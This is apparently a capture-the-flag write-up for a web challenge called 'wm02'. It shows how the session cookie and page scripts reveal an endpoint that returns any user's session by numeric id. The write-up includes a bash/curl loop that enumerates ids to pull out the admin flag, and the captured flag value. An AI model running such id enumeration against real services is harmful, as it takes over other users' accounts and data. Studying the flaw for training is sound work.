+++
title = "wm02"
+++

Description:

>Visit the site at https://ggcs-wm02.allyourbases.co and find a way to log into the admin user without guessing a password.
>
>Note: You can log in as a regular user with the username: `linus` and the password: `torvalds`

Logging in with these credentials, we find a cookie with the name "login", contents:
```json
{"id": 82, "data": {"username": "linus", "privilege": "user"}}
```

Hmm, interesting. The page also contains a div with a suspicious looking id:
```html
<div id="flag"></div>
```

Script in the header also has this section:
```javascript
// Display user data.
$('#body').append("You are signed in as " + JSON.parse(login).data.username + ".")
if (JSON.parse(login).data.hasOwnProperty('flag')) {
    $('#flag').append("Flag: " + JSON.parse(login).data.flag) 
}
```

Sketchy. This does mean that we can't just get away with modifying our cookie; we have to get the server to do that for
us.

Further up we find that the page executes the following code if the login doesn't have the data property:
```javascript
$.ajax({
type: "POST",
url: "https://oo5apsmnc8.execute-api.eu-west-1.amazonaws.com/stag/wm02",
contentType: 'application/json',
data: JSON.stringify({
    'id': JSON.parse(login).id
}),
success: function(res){
        Cookies.set("login", res.body);
        login = Cookies.get('login');
        $('#body').append("You are signed in as " + JSON.parse(login).data.username + ".")
        if (JSON.parse(login).data.hasOwnProperty('flag')) {
            $('#flag').append("Flag: " + JSON.parse(login).data.flag) 
        }
},
error: function(err){
    console.log(err);
}
});
```

If we can guess the admin id, then we can get the flag information! Huzzah!

Quick little dirty script with jq:
```bash
for i in {1..100}; do
  echo -n "$i: "
  curl -s -X POST "https://oo5apsmnc8.execute-api.eu-west-1.amazonaws.com/stag/wm02" -d '{"id": '"$i"'}' | jq -r .body | jq -r .data.flag
done | grep -v null
```

Boom:
```text
33: IncREMentaLl_SessIoNs-1920
```
